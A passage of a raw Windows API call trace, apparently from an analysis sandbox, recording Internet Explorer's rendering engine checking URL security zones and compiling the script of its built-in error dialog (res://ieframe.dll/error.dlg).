RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.234] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.234] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.234] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.234] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.234] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.234] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.234] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.234] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.235] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.235] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.235] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.236] GetFocus () returned 0x103e2 [0161.237] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.237] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.237] GetFocus () returned 0x103e2 [0161.237] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x1998e8 | out: lpPoint=0x1998e8) returned 1 [0161.237] GetFocus () returned 0x103e2 [0161.238] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x1998e8 | out: lpPoint=0x1998e8) returned 1 [0161.238] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.240] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.240] memcpy_s (in: _Destination=0x198d80, _DestinationSize=0xc28, _Source=0x6e8993e0, _SourceSize=0xc28 | out: _Destination=0x198d80) returned 0x0 [0161.240] StrCmpICW (pszStr1="ms sans serif", pszStr2="sans-serif") returned -6 [0161.240] StrCmpICW (pszStr1="ms sans serif", pszStr2="serif") returned -6 [0161.240] StrCmpICW (pszStr1="ms sans serif", pszStr2="monospace") returned 4 [0161.240] StrCmpICW (pszStr1="ms sans serif", pszStr2="cursive") returned 10 [0161.240] StrCmpICW (pszStr1="ms sans serif", pszStr2="fantasy") returned 7 [0161.240] StrCmpICW (pszStr1="ms sans serif", pszStr2="inherit") returned 4 [0161.240] StrCmpICW (pszStr1="ms sans serif", pszStr2="initial") returned 4 [0161.240] StrCmpICW (pszStr1="ms sans serif", pszStr2="default") returned 9 [0161.240] MulDiv (nNumber=8000, nNumerator=20, nDenominator=1000) returned 160 [0161.241] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.241] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.241] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.241] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7778 [0161.242] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.242] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d60 [0161.242] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9408 [0161.242] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7d28 [0161.242] HashData (in: pbData=0x6d940c, cbData=0x4, pbHash=0x6d9410, cbHash=0x2 | out: pbHash=0x6d9410) returned 0x0 [0161.242] HashData (in: pbData=0x6d7d28, cbData=0x2, pbHash=0x198830, cbHash=0x2 | out: pbHash=0x198830) returned 0x0 [0161.242] HashData (in: pbData=0x6d7d2a, cbData=0x2, pbHash=0x198830, cbHash=0x2 | out: pbHash=0x198830) returned 0x0 [0161.242] HashData (in: pbData=0x6d7d2c, cbData=0x8, pbHash=0x198844, cbHash=0x2 | out: pbHash=0x198844) returned 0x0 [0161.242] HashData (in: pbData=0x6d7d34, cbData=0x8, pbHash=0x198830, cbHash=0x2 | out: pbHash=0x198830) returned 0x0 [0161.242] HashData (in: pbData=0x6d7d3c, cbData=0x8, pbHash=0x198830, cbHash=0x2 | out: pbHash=0x198830) returned 0x0 [0161.243] HashData (in: pbData=0x6d7d44, cbData=0x2, pbHash=0x198830, cbHash=0x2 | out: pbHash=0x198830) returned 0x0 [0161.243] HashData (in: pbData=0x6d7d46, cbData=0x2, pbHash=0x198830, cbHash=0x2 | out: pbHash=0x198830) returned 0x0 [0161.243] HashData (in: pbData=0x6d7d48, cbData=0x8, pbHash=0x198830, cbHash=0x2 | out: pbHash=0x198830) returned 0x0 [0161.243] HashData (in: pbData=0x6d7d50, cbData=0x8, pbHash=0x198830, cbHash=0x2 | out: pbHash=0x198830) returned 0x0 [0161.243] HashData (in: pbData=0x19885c, cbData=0x4, pbHash=0x198848, cbHash=0x2 | out: pbHash=0x198848) returned 0x0 [0161.243] HashData (in: pbData=0x6d7d5c, cbData=0x8, pbHash=0x198844, cbHash=0x2 | out: pbHash=0x198844) returned 0x0 [0161.243] HashData (in: pbData=0x6d7d64, cbData=0x8, pbHash=0x198830, cbHash=0x2 | out: pbHash=0x198830) returned 0x0 [0161.243] HashData (in: pbData=0x6d7d70, cbData=0x4, pbHash=0x198844, cbHash=0x2 | out: pbHash=0x198844) returned 0x0 [0161.243] HashData (in: pbData=0x6d7d74, cbData=0x8, pbHash=0x198844, cbHash=0x2 | out: pbHash=0x198844) returned 0x0 [0161.243] HashData (in: pbData=0x6d7d7c, cbData=0x8, pbHash=0x198830, cbHash=0x2 | out: pbHash=0x198830) returned 0x0 [0161.243] HashData (in: pbData=0x6d7d88, cbData=0x4, pbHash=0x198844, cbHash=0x2 | out: pbHash=0x198844) returned 0x0 [0161.243] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7d28 | out: hHeap=0x5e0000) returned 1 [0161.243] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9408 | out: hHeap=0x5e0000) returned 1 [0161.243] HashData (in: pbData=0x9ee6d60, cbData=0x1, pbHash=0x1988ac, cbHash=0x2 | out: pbHash=0x1988ac) returned 0x0 [0161.243] HashData (in: pbData=0x1988c4, cbData=0x4, pbHash=0x1988ac, cbHash=0x2 | out: pbHash=0x1988ac) returned 0x0 [0161.243] HashData (in: pbData=0x9ee6d64, cbData=0x4, pbHash=0x1988c8, cbHash=0x2 | out: pbHash=0x1988c8) returned 0x0 [0161.243] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d60 | out: hHeap=0x5e0000) returned 1 [0161.243] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7778 | out: hHeap=0x5e0000) returned 1 [0161.244] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.244] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.244] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x1998e8 | out: lpPoint=0x1998e8) returned 1 [0161.244] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x1998e8 | out: lpPoint=0x1998e8) returned 1 [0161.245] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x1998e8 | out: lpPoint=0x1998e8) returned 1 [0161.245] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x1998e8 | out: lpPoint=0x1998e8) returned 1 [0161.245] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.245] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.245] GetCurrentThreadId () returned 0xb48 [0161.245] GetCurrentThreadId () returned 0xb48 [0161.246] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.246] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.246] GetCurrentThreadId () returned 0xb48 [0161.246] GetCurrentThreadId () returned 0xb48 [0161.246] GetCurrentThreadId () returned 0xb48 [0161.246] GetCurrentThreadId () returned 0xb48 [0161.247] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x610430, hWnd=0x103e2, phIMC=0x199da0 | out: phIMC=0x199da0*=0x0) returned 0x0 [0161.247] GetFocus () returned 0x103e2 [0161.247] GetFocus () returned 0x103e2 [0161.257] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3098007628800) returned 1 [0161.257] GetCurrentThreadId () returned 0xb48 [0161.257] GetCurrentThreadId () returned 0xb48 [0161.257] GetCurrentThreadId () returned 0xb48 [0161.257] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.258] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.258] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x7c) returned 0x68bf48 [0161.258] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68bf48 | out: hHeap=0x5e0000) returned 1 [0161.258] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.258] GetFocus () returned 0x103e2 [0161.259] GetWindowRect (in: hWnd=0x103e2, lpRect=0x199d44 | out: lpRect=0x199d44) returned 1 [0161.259] PtInRect (lprc=0x199d44, pt=0x1d6) returned 0 [0161.259] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.259] malloc (_Size=0x15c) returned 0xc82de8 [0161.261] LsSetDoc () returned 0x0 [0161.261] LsCreateLine () returned 0x0 [0161.261] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.261] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.261] LsdnFinishRegular () returned 0x0 [0161.261] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.261] LsdnFinishRegular () returned 0x0 [0161.262] LsQueryLineCpPpoint () returned 0x0 [0161.262] IOleInPlaceFrame:SetMenu (This=0xd0f640, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0161.262] IOleInPlaceFrame:SetMenu (This=0xd0f620, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x0) returned 0x0 [0161.262] LsQueryLineCpPpoint () returned 0x0 [0161.262] LsDestroyLine () returned 0x0 [0161.263] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0161.263] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.263] IsRectEmpty (lprc=0x199b80) returned 1 [0161.263] GetCurrentThreadId () returned 0xb48 [0161.264] StrCmpNICW (lpStr1="text/", lpStr2="text/", nChar=5) returned 0 [0161.264] StrCmpICW (pszStr1="javascript", pszStr2="javascript") returned 0 [0161.264] GetCurrentThreadId () returned 0xb48 [0161.264] StrCmpNICW (lpStr1="text/", lpStr2="text/", nChar=5) returned 0 [0161.264] StrCmpICW (pszStr1="javascript", pszStr2="javascript") returned 0 [0161.264] GetCurrentThreadId () returned 0xb48 [0161.264] ParseURLW (in: pcszURL="res://ieframe.dll/error.dlg", ppu=0x199de8 | out: ppu=0x199de8) returned 0x0 [0161.264] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0161.264] IUnknown:AddRef (This=0x68e1fc) returned 0x8 [0161.264] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0161.264] IInternetSecurityManager:MapUrlToZone (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", pdwZone=0x199d94, dwFlags=0x0 | out: pdwZone=0x199d94*=0xffffffff) returned 0x800c0011 [0161.264] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0161.264] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0161.264] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0161.265] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x6cdf88, pUri=0x68e1fc, dwAction=0x1400, pPolicy=0x199d98, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x199d78 | out: pPolicy=0x199d98*=0x0, pdwOutFlags=0x199d78*=0x0) returned 0x0 [0161.265] IInternetSecurityManager:ProcessUrlAction (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", dwAction=0x1400, pPolicy=0x199d98, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x199d98*=0x0) returned 0x0 [0161.265] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0161.265] IUnknown:Release (This=0x6cdf88) returned 0x1 [0161.265] IUnknown:Release (This=0x68e1fc) returned 0x7 [0161.265] IUri:GetAbsoluteUri (in: This=0x68dcbc, pbstrAbsoluteUri=0x199e1c | out: pbstrAbsoluteUri=0x199e1c*="res://ieframe.dll/error.js") returned 0x0 [0161.265] IUri:GetSchemeName (in: This=0x68dcbc, pbstrSchemeName=0x199dfc | out: pbstrSchemeName=0x199dfc*="res") returned 0x0 [0161.265] _wcsnicmp (_String1="res", _String2="data", _MaxCount=0x5) returned 14 [0161.265] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0161.265] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x3a) returned 0x6db628 [0161.266] IUnknown:QueryInterface (in: This=0xd1e334, riid=0x703b4c58*(Data1=0xc90db44a, Data2=0x1902, Data3=0x451e, Data4=([0]=0xbd, [1]=0xf0, [2]=0x5c, [3]=0x89, [4]=0x66, [5]=0xb, [6]=0x52, [7]=0x8c)), ppvObject=0x197b00 | out: ppvObject=0x197b00*=0x0) returned 0x80004002 [0161.266] IInternetSecurityManager:GetSecurityId (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.js", pbSecurityId=0x199bf0, pcbSecurityId=0x199bec*=0x200, dwReserved=0x0 | out: pbSecurityId=0x199bf0*=0x0, pcbSecurityId=0x199bec*=0x200) returned 0x800c0011 [0161.266] IUnknown:Release (This=0x6cdf88) returned 0x1 [0161.266] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db628 | out: hHeap=0x5e0000) returned 1 [0161.266] IUnknown:AddRef (This=0x68e1fc) returned 0x8 [0161.266] IUri:GetPropertyDWORD (in: This=0x68e1fc, uriProp=0x11, pdwProperty=0x199944, dwFlags=0x0 | out: pdwProperty=0x199944*=0x12) returned 0x0 [0161.266] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0161.266] IUnknown:QueryInterface (in: This=0xd1e334, riid=0x703b4c58*(Data1=0xc90db44a, Data2=0x1902, Data3=0x451e, Data4=([0]=0xbd, [1]=0xf0, [2]=0x5c, [3]=0x89, [4]=0x66, [5]=0xb, [6]=0x52, [7]=0x8c)), ppvObject=0x19989c | out: ppvObject=0x19989c*=0x0) returned 0x80004002 [0161.266] IInternetSecurityManager:GetSecurityId (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", pbSecurityId=0x1999c0, pcbSecurityId=0x1999bc*=0x200, dwReserved=0x0 | out: pbSecurityId=0x1999c0*=0x0, pcbSecurityId=0x1999bc*=0x200) returned 0x800c0011 [0161.266] IUnknown:Release (This=0x6cdf88) returned 0x1 [0161.266] IUnknown:Release (This=0x68e1fc) returned 0x7 [0161.266] ParseURLW (in: pcszURL="res://ieframe.dll/error.dlg", ppu=0x199d60 | out: ppu=0x199d60) returned 0x0 [0161.266] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0161.267] IUnknown:AddRef (This=0x68e1fc) returned 0x8 [0161.267] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0161.267] IInternetSecurityManager:MapUrlToZone (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", pdwZone=0x199d0c, dwFlags=0x0 | out: pdwZone=0x199d0c*=0xffffffff) returned 0x800c0011 [0161.267] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0161.267] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0161.267] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0161.267] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x6cdf88, pUri=0x68e1fc, dwAction=0x1400, pPolicy=0x199d10, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x199cf0 | out: pPolicy=0x199d10*=0x0, pdwOutFlags=0x199cf0*=0x0) returned 0x0 [0161.267] IInternetSecurityManager:ProcessUrlAction (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", dwAction=0x1400, pPolicy=0x199d10, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x199d10*=0x0) returned 0x0 [0161.267] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0161.267] IUnknown:Release (This=0x6cdf88) returned 0x1 [0161.267] IUnknown:Release (This=0x68e1fc) returned 0x7 [0161.267] StrCmpICW (pszStr1="JavaScript", pszStr2="javascript") returned 0 [0161.267] StrCmpICW (pszStr1="JavaScript", pszStr2="javascript") returned 0 [0161.267] GetCurrentThreadId () returned 0xb48 [0161.267] IUri:GetAbsoluteUri (in: This=0x68dcbc, pbstrAbsoluteUri=0x199d68 | out: pbstrAbsoluteUri=0x199d68*="res://ieframe.dll/error.js") returned 0x0 [0161.267] CreateUri (in: pwzURI="error.js", dwFlags=0x3002b85, dwReserved=0x0, ppURI=0x199ce4 | out: ppURI=0x199ce4*=0x68eabc) returned 0x0 [0161.268] ParseURLW (in: pcszURL="res://ieframe.dll/error.dlg", ppu=0x199c08 | out: ppu=0x199c08) returned 0x0 [0161.268] IUnknown:AddRef (This=0x68e1fc) returned 0x8 [0161.268] IUnknown:QueryInterface (in: This=0x68e1fc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199c64 | out: ppvObject=0x199c64*=0x68e1fc) returned 0x0 [0161.268] IUnknown:Release (This=0x68e1fc) returned 0x8 [0161.268] IUnknown:AddRef (This=0x68e1fc) returned 0x9 [0161.268] CoInternetCombineIUri (in: pBaseUri=0x68e1fc, pRelativeUri=0x68eabc, dwCombineFlags=0x16000000, ppCombinedUri=0x199ce0, dwReserved=0x0 | out: ppCombinedUri=0x199ce0*=0x9ee0f64) returned 0x0 [0161.268] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0161.268] IUnknown:QueryInterface (in: This=0x6e784f90, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x198670 | out: ppvObject=0x198670*=0x6e784f9c) returned 0x0 [0161.268] IUnknown:Release (This=0x6e784f90) returned 0x1 [0161.269] IInternetProtocolInfo:CombineUrl (in: This=0x6e784f9c, pwzBaseUrl="res://ieframe.dll/error.dlg", pwzRelativeUrl="error.js", dwCombineFlags=0x16000000, pwzResult=0x198b4c, cchResult=0x825, pcchResult=0x198b34, dwReserved=0x0 | out: pwzResult="", pcchResult=0x198b34*=0x0) returned 0x800c0011 [0161.269] IUnknown:Release (This=0x6e784f9c) returned 0x1 [0161.269] IUnknown:Release (This=0x68e1fc) returned 0x9 [0161.269] IUnknown:Release (This=0x68e1fc) returned 0x8 [0161.269] IUnknown:QueryInterface (in: This=0x9ee0f64, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199cbc | out: ppvObject=0x199cbc*=0x9ee0f64) returned 0x0 [0161.269] IUnknown:Release (This=0x9ee0f64) returned 0x2 [0161.269] IUnknown:AddRef (This=0x9ee0f64) returned 0x3 [0161.269] IUnknown:Release (This=0x68eabc) returned 0x4 [0161.269] IUnknown:Release (This=0x9ee0f64) returned 0x2 [0161.270] IUnknown:Release (This=0x9ee0f64) returned 0x1 [0161.270] SysStringLen (param_1="res://ieframe.dll/error.dlg") returned 0x1b [0161.270] SysStringLen (param_1="res://ieframe.dll/error.js") returned 0x1a [0161.272] GetCurrentThreadId () returned 0xb48 [0161.272] GetCurrentThreadId () returned 0xb48 [0161.272] SysStringLen (param_1=0x0) returned 0x0 [0161.272] SysStringLen (param_1="res://ieframe.dll/error.js") returned 0x1a [0161.272] _strcmpi (_Str1="", _Str2="") returned 0 [0161.272] malloc (_Size=0x22c) returned 0xc5d598 [0161.272] malloc (_Size=0x804) returned 0xc840f0 [0161.272] malloc (_Size=0x19c) returned 0xc5d7d0 [0161.272] VirtualAlloc (lpAddress=0x9554000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x9554000 [0161.274] wcscpy_s (in: _Destination=0xc84600, _SizeInWords=0x7, _Source="window" | out: _Destination="window") returned 0x0 [0161.274] wcscpy_s (in: _Destination=0xc8460e, _SizeInWords=0x8, _Source="onerror" | out: _Destination="onerror") returned 0x0 [0161.274] wcscpy_s (in: _Destination=0xc848c4, _SizeInWords=0x7, _Source="window" | out: _Destination="window") returned 0x0 [0161.274] wcscpy_s (in: _Destination=0xc848d2, _SizeInWords=0x10, _Source="dialogArguments" | out: _Destination="dialogArguments") returned 0x0 [0161.274] malloc (_Size=0x1004) returned 0xc84900 [0161.274] wcscpy_s (in: _Destination=0xc84948, _SizeInWords=0x6, _Source="btnNo" | out: _Destination="btnNo") returned 0x0 [0161.274] wcscpy_s (in: _Destination=0xc84954, _SizeInWords=0x8, _Source="onclick" | out: _Destination="onclick") returned 0x0 [0161.274] wcscpy_s (in: _Destination=0xc84a00, _SizeInWords=0x6, _Source="btnNo" | out: _Destination="btnNo") returned 0x0 [0161.274] wcscpy_s (in: _Destination=0xc84a0c, _SizeInWords=0xa, _Source="onkeydown" | out: _Destination="onkeydown") returned 0x0 [0161.274] wcscpy_s (in: _Destination=0xc84a74, _SizeInWords=0x7, _Source="btnYes" | out: _Destination="btnYes") returned 0x0 [0161.274] wcscpy_s (in: _Destination=0xc84a82, _SizeInWords=0x8, _Source="onclick" | out: _Destination="onclick") returned 0x0 [0161.274] wcscpy_s (in: _Destination=0xc84ac4, _SizeInWords=0x7, _Source="btnYes" | out: _Destination="btnYes") returned 0x0 [0161.274] wcscpy_s (in: _Destination=0xc84ad2, _SizeInWords=0xa, _Source="onkeydown" | out: _Destination="onkeydown") returned 0x0 [0161.274] wcscpy_s (in: _Destination=0xc84b3c, _SizeInWords=0x9, _Source="document" | out: _Destination="document") returned 0x0 [0161.274] wcscpy_s (in: _Destination=0xc84b4e, _SizeInWords=0xb, _Source="onkeypress" | out: _Destination="onkeypress") returned 0x0 [0161.275] VirtualAlloc (lpAddress=0x9555000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x9555000 [0161.275] wcscpy_s (in: _Destination=0xc84be0, _SizeInWords=0x8, _Source="spnLine" | out: _Destination="spnLine") returned 0x0 [0161.275] wcscpy_s (in: _Destination=0xc84bf0, _SizeInWords=0xa, _Source="innerText" | out: _Destination="innerText") returned 0x0 [0161.275] wcscpy_s (in: _Destination=0xc84c8c, _SizeInWords=0xd, _Source="spnCharacter" | out: _Destination="spnCharacter") returned 0x0 [0161.275] wcscpy_s (in: _Destination=0xc84ca6, _SizeInWords=0xa, _Source="innerText" | out: _Destination="innerText") returned 0x0 [0161.275] wcscpy_s (in: _Destination=0xc84d18, _SizeInWords=0x9, _Source="spnError" | out: _Destination="spnError") returned 0x0 [0161.275] wcscpy_s (in: _Destination=0xc84d2a, _SizeInWords=0xa, _Source="innerText" | out: _Destination="innerText") returned 0x0 [0161.275] wcscpy_s (in: _Destination=0xc84d94, _SizeInWords=0x8, _Source="spnCode" | out: _Destination="spnCode") returned 0x0 [0161.276] wcscpy_s (in: _Destination=0xc84da4, _SizeInWords=0xa, _Source="innerText" | out: _Destination="innerText") returned 0x0 [0161.276] wcscpy_s (in: _Destination=0xc84e04, _SizeInWords=0x7, _Source="txaURL" | out: _Destination="txaURL") returned 0x0 [0161.276] wcscpy_s (in: _Destination=0xc84e12, _SizeInWords=0xa, _Source="innerText" | out: _Destination="innerText") returned 0x0 [0161.276] wcscpy_s (in: _Destination=0xc84e98, _SizeInWords=0xb, _Source="objOptions" | out: _Destination="objOptions") returned 0x0 [0161.276] wcscpy_s (in: _Destination=0xc84eae, _SizeInWords=0xb, _Source="errorDebug" | out: _Destination="errorDebug") returned 0x0 [0161.276] wcscpy_s (in: _Destination=0xc84eec, _SizeInWords=0x9, _Source="divDebug" | out: _Destination="divDebug") returned 0x0 [0161.276] wcscpy_s (in: _Destination=0xc84efe, _SizeInWords=0xa, _Source="innerText" | out: _Destination="innerText") returned 0x0 [0161.276] wcscpy_s (in: _Destination=0xc85084, _SizeInWords=0x6, _Source="event" | out: _Destination="event") returned 0x0 [0161.276] wcscpy_s (in: _Destination=0xc85090, _SizeInWords=0x8, _Source="keyCode" | out: _Destination="keyCode") returned 0x0 [0161.276] wcscpy_s (in: _Destination=0xc85114, _SizeInWords=0x6, _Source="event" | out: _Destination="event") returned 0x0 [0161.276] wcscpy_s (in: _Destination=0xc85120, _SizeInWords=0xb, _Source="srcElement" | out: _Destination="srcElement") returned 0x0 [0161.276] wcscpy_s (in: _Destination=0xc85138, _SizeInWords=0x11, _Source="event.srcElement" | out: _Destination="event.srcElement") returned 0x0 [0161.276] wcscpy_s (in: _Destination=0xc8515a, _SizeInWords=0x3, _Source="id" | out: _Destination="id") returned 0x0 [0161.276] VirtualAlloc (lpAddress=0x9557000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x9557000 [0161.277] wcscpy_s (in: _Destination=0xc85204, _SizeInWords=0x7, _Source="window" | out: _Destination="window") returned 0x0 [0161.277] wcscpy_s (in: _Destination=0xc85212, _SizeInWords=0xc, _Source="returnValue" | out: _Destination="returnValue") returned 0x0 [0161.277] wcscpy_s (in: _Destination=0xc85284, _SizeInWords=0x7, _Source="window" | out: _Destination="window") returned 0x0 [0161.277] wcscpy_s (in: _Destination=0xc85292, _SizeInWords=0x6, _Source="event" | out: _Destination="event") returned 0x0 [0161.277] wcscpy_s (in: _Destination=0xc852a0, _SizeInWords=0xd, _Source="window.event" | out: _Destination="window.event") returned 0x0 [0161.277] wcscpy_s (in: _Destination=0xc852ba, _SizeInWords=0x8, _Source="keyCode" | out: _Destination="keyCode") returned 0x0 [0161.277] VirtualAlloc (lpAddress=0x9558000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x9558000 [0161.277] free (_Block=0xc5d7d0) [0161.278] VirtualAlloc (lpAddress=0x9559000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x9559000 [0161.278] wcscpy_s (in: _Destination=0x735c3c0, _SizeInWords=0xc, _Source="HandleError" | out: _Destination="HandleError") returned 0x0 [0161.278] malloc (_Size=0x94) returned 0xc64a70 [0161.278] VirtualAlloc (lpAddress=0x759c000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x759c000 [0161.279] wcscpy_s (in: _Destination=0x7368d90, _SizeInWords=0x8, _Source="loadBdy" | out: _Destination="loadBdy") returned 0x0 [0161.279] VirtualAlloc (lpAddress=0x955a000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x955a000 [0161.280] wcscpy_s (in: _Destination=0x735c3e0, _SizeInWords=0xc, _Source="SwitchFocus" | out: _Destination="SwitchFocus") returned 0x0 [0161.280] wcscpy_s (in: _Destination=0x735c400, _SizeInWords=0xb, _Source="btnOKClick" | out: _Destination="btnOKClick") returned 0x0 [0161.280] VirtualAlloc (lpAddress=0x955b000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x955b000 [0161.308] wcscpy_s (in: _Destination=0x735c420, _SizeInWords=0xc, _Source="btnYesClick" | out: _Destination="btnYesClick") returned 0x0 [0161.308] wcscpy_s (in: _Destination=0x735c440, _SizeInWords=0xc, _Source="docKeypress" | out: _Destination="docKeypress") returned 0x0 [0161.308] malloc (_Size=0x80) returned 0xc4e220 [0161.309] VirtualAlloc (lpAddress=0x759d000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x759d000 [0161.309] VirtualAlloc (lpAddress=0x955c000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x955c000 [0161.310] malloc (_Size=0xc) returned 0xc51f48 [0161.310] malloc (_Size=0xc) returned 0xc51f60 [0161.310] malloc (_Size=0x10) returned 0xc52050 [0161.310] malloc (_Size=0x28) returned 0xc5d218 [0161.310] free (_Block=0xc52050) [0161.310] malloc (_Size=0x174) returned 0xc82f50 [0161.310] VirtualAlloc (lpAddress=0x955d000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x955d000 [0161.311] malloc (_Size=0x30) returned 0xc5a450 [0161.311] malloc (_Size=0xc) returned 0xc52110 [0161.311] malloc (_Size=0xc) returned 0xc52038 [0161.311] malloc (_Size=0x10) returned 0xc521d0 [0161.311] malloc (_Size=0x28) returned 0xc5d308 [0161.311] free (_Block=0xc521d0) [0161.311] malloc (_Size=0x58) returned 0xc53ce8 [0161.311] free (_Block=0xc5d308) [0161.311] malloc (_Size=0x7c) returned 